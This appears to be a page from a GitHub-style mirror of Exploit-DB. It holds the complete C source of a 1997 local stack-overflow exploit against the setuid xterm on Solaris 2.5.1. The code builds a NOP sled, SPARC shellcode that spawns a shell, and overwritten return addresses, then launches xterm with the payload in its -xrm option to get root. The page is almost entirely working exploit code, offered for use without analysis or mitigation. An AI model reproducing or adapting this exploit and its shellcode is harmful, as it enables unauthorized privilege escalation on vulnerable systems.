bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/solaris/local/338.c
Offensive Security 477bcbdcc0 DB: 2016-03-17 
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
2016-03-17 07:07:56 +00:00

83 lines
2.4 KiB
C
Executable file
Raw Blame History

/*
* X11R6.3 xterm exploit for solaris 5.5.1 by DCRH 28/5/97
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
#define EXTRA2 1300
#define BUF_LENGTH 400
#define EXTRA 500
/* Need an addr such that contents of addr+0xe98 = 0 */
#define SAFE_ADDR ((unsigned)0xefff2008)
#define STACK_OFFSET 0x4800
#define SPARC_NOP 0xa61cc013
u_long sparc_shellcode[] =
{
0x2d0bd89a, /* sethi %hi(0x2f626800), %l6 */
0xac15a16e, /* or %l6, 0x16e, %l6 */
0x2f0bdadc, /* sethi %hi(0x2f6b7000), %l7 */
0xae15e368, /* or %l7, 0x368, %l7 */
0x900b800e, /* and %sp, %sp, %o0 */
0x9203a00c, /* add %sp, 0xc, %o1 */
0x941ac00b, /* xor %o3, %o3, %o2 */
0x9c03a014, /* add %sp, 0x14, %sp */
0xec3bbfec, /* std %l6, [ %sp + -20 ] */
0xc023bff4, /* clr [ %sp + -12 ] */
0xdc23bff8, /* st %sp, [ %sp + -8 ] */
0xc023bffc, /* clr [ %sp + -4 ] */
0x8210203b, /* mov 0x3b, %g1 */
0x91d02008, /* ta 8 */
0xffffffff, /* illegal */
};
u_long get_sp(void)
{
asm("mov %sp,%i0 \n");
}
char buf[BUF_LENGTH + EXTRA + EXTRA2 + 8];
char longvar[0x4000] = "BLAH=";
void main(int argc, char *argv[])
{
char *env[2];
unsigned long targ_addr;
u_long *long_p;
int i, code_length = sizeof(sparc_shellcode),dso=0;
if(argc > 1) dso=atoi(argv[1]);
long_p =(u_long *) buf;
for (i = 0; i < EXTRA2 / sizeof(u_long); i++)
*long_p++ = (SAFE_ADDR >> 8) | (SAFE_ADDR << 24);
targ_addr = get_sp() - STACK_OFFSET - dso;
for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
*long_p++ = SPARC_NOP;
for (i = 0; i < code_length / sizeof(u_long); i++)
*long_p++ = sparc_shellcode[i];
for (i = 0; i < EXTRA / sizeof(u_long); i++)
*long_p++ = targ_addr;
printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n",
targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);
/* This is just to shove the stack down a bit */
memset(&longvar[5], 'a', sizeof longvar-6);
longvar[sizeof longvar -1] = '\0';
env[0] = longvar;
env[1] = NULL;
execle("./xterm", "xterm", "-xrm", buf,(char *) 0, env);
perror("execl failed");
}
// milw0rm.com [1997-05-28]
Reference in a new issue View git blame Copy permalink